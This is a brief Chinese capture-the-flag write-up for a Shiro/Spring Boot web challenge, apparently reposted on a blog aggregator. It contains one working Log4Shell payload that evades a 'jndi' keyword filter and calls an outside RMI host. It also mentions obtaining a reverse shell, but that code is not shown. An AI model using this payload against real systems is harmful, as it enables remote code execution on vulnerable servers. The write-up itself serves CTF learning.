[长安杯]web-shiro复现

[长安杯]web-shiro复现,第1张

[长安杯]web-shiro复现

长安杯-shiro?复现

浏览器显示是springboot框架
登录伪造shiro,关键词为remeber-me

shiro直接打,打不进去
springboot还可以写log4j漏洞,测试一下

jndi被过滤了
进行绕过

${${::-j}ndi:rmi://py2hu7.ceye.io/exp}



成功接收到dnslog信息。
构建jndi反dshell,这里反dshell的命令需要bypass一下

在这里插入代码片




反d的有点慢,但是可以成功反dshell并拿取flag。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5703657.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-17
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存